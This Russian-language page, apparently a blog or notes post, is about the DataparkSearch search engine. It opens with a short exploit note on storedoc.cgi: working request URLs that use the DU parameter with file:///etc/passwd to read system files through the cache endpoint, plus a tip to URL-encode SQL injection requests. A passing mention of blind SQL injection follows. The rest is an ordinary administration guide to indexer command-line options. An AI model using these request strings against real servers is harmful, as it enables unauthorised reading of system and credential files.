DataparkSearch Engine, SQL injection, XSS, Cross Site Scripting, File Include

DataparkSearch
DataPark Search Engine

Все SQL-inject запросы надо кодировать в Urlencode ALL, иначе экранируются.

В фаиле storedoc.cgi

Чтение фаилов: /etc/passwd


в GET параметре DU чтение фаила file:///etc/passwd
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146


/kurgan/cache?DU=file:///etc/passwd
/kurgan/cache?DU=file%3a%2f%2f%2fetc%2fpasswd



Blind SQL Injection

Читать дальше →

DataparkSearch Engine Команды управления

Если http-сервер поддерживает любой из методов кодирования gzip, deflate, identity, compress он шлёт ответ, закодированый этим методом.
Использование сжатия http-запросов позволяет уменьшить трафик в два и более раз.
./configure --with-zlib

Запустите indexer для индексирвоания ваших данных и записи информации об URL:
/usr/local/dpsearch/sbin/indexer -W

переиндекировать все документы, независимо от того, устарели они или нет, используйте ключ -a
/usr/local/dpsearch/sbin/indexer -a

Это может быть полезным, например, когда меняются правила Allow/Disallow в indexer.conf и необходимо добавить новые страницы, которые раньше были запрещены к обработке.
Ключ indexerа -m заставляет разбирать заново каждый документ, независимо от того, измён он или нет.
/usr/local/dpsearch/sbin/indexer -m

Управление подсекциями
-t соответсвует ограничению по тэгу
-g соответсвует ограничению по категории
-u — ограничение по части URL (поддерживаются шаблоны SQL LIKE с символами % и _)
-s — ограничение по HTTP статусу документа
-y — ограничения по Content-Type

Как очистить базу данных
/usr/local/dpsearch/sbin/indexer -C — Вы можете также удалить тольеко часть базы, используя ключи указания подсекций -t,-g,-u,-s,-y.

Создание SQL-таблиц
/usr/local/dpsearch/sbin/indexer -Ecreate

Удаление SQL-таблиц
/usr/local/dpsearch/sbin/indexer -Edrop

Статистика базы данных

/usr/local/dpsearch/sbin/indexer -S

Проверка ссылок
Например, indexer -I -s 404 покажет адреса всех ненайденных ('Not found') документов вместе с адресами страницами, содержащими ссылки на эти документы.
/usr/local/dpsearch/sbin/indexer -I